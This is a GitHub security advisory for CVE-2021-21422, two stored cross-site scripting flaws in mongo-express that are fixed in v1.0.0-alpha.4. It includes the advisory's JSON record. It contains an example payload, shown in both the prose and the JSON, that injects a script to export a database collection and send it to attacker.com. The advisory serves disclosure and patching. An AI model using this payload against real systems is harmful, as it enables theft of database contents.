ghsa-7p8h-86p5-wv3p
Vulnerability from github
Two kinds of XSS were found:
- As mentioned in https://github.com/mongo-express/mongo-express/issues/577 when the content of a cell grows larger than supported size, clicking on a row will show full document unescaped, however this needs admin interaction on cell.
- Data cells identified as media will be rendered as media, without being sanitized. Example of different renders: image, audio, video, etc.
Impact
As an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use this payload:
JSON
{"someField": "long string here to surpass the limit of document ...... <script> await fetch('http://localhost:8081/db/testdb/export/users').then( async res => await fetch('http://attacker.com?backup='+encodeURIComponent((await res.text())))) </script>" }
This will send an export of a collection to the attacker without even admin knowing. Other types of attacks such as dropping a database\collection are also possible.
Patches
Upgrade to v1.0.0-alpha.4
For more information
If you have any questions or comments about this advisory: * Open an issue in mongo-express * Email me at jafar.akhoondali@gmail.com
{ "affected": [ { "database_specific": { "last_known_affected_version_range": "\u003c= 1.0.0-alpha.2" }, "package": { "ecosystem": "npm", "name": "mongo-express" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.0.0-alpha.4" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2021-21422" ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2021-06-21T17:53:12Z", "nvd_published_at": "2021-06-21T19:15:00Z", "severity": "HIGH" }, "details": "Two kinds of XSS were found:\n\n1. As mentioned in https://github.com/mongo-express/mongo-express/issues/577 when the content of a cell grows larger than supported size, clicking on a row will show full document unescaped, however this needs admin interaction on cell.\n2. Data cells identified as media will be rendered as media, without being sanitized. Example of different renders: image, audio, video, etc.\n\n\n\n### Impact\nAs an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use this payload:\n```JSON\n{\"someField\": \"long string here to surpass the limit of document ...... \u003cscript\u003e await fetch(\u0027http://localhost:8081/db/testdb/export/users\u0027).then( async res =\u003e await fetch(\u0027http://attacker.com?backup=\u0027+encodeURIComponent((await res.text())))) \u003c/script\u003e\" }\n```\nThis will send an export of a collection to the attacker without even admin knowing. Other types of attacks such as dropping a database\\collection are also possible.\n\n### Patches\nUpgrade to `v1.0.0-alpha.4`\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [mongo-express](https://github.com/mongo-express/mongo-express/issues/new)\n* Email me at [jafar.akhoondali@gmail.com](mailto:jafar.akhoondali@gmail.com)\n", "id": "GHSA-7p8h-86p5-wv3p", "modified": "2021-06-22T15:44:45Z", "published": "2021-06-28T17:18:04Z", "references": [ { "type": "WEB", "url": "https://github.com/mongo-express/mongo-express/security/advisories/GHSA-7p8h-86p5-wv3p" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21422" }, { "type": "WEB", "url": "https://github.com/mongo-express/mongo-express/issues/577" }, { "type": "WEB", "url": "https://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4b" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "type": "CVSS_V3" } ], "summary": "Cross-site scripting" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.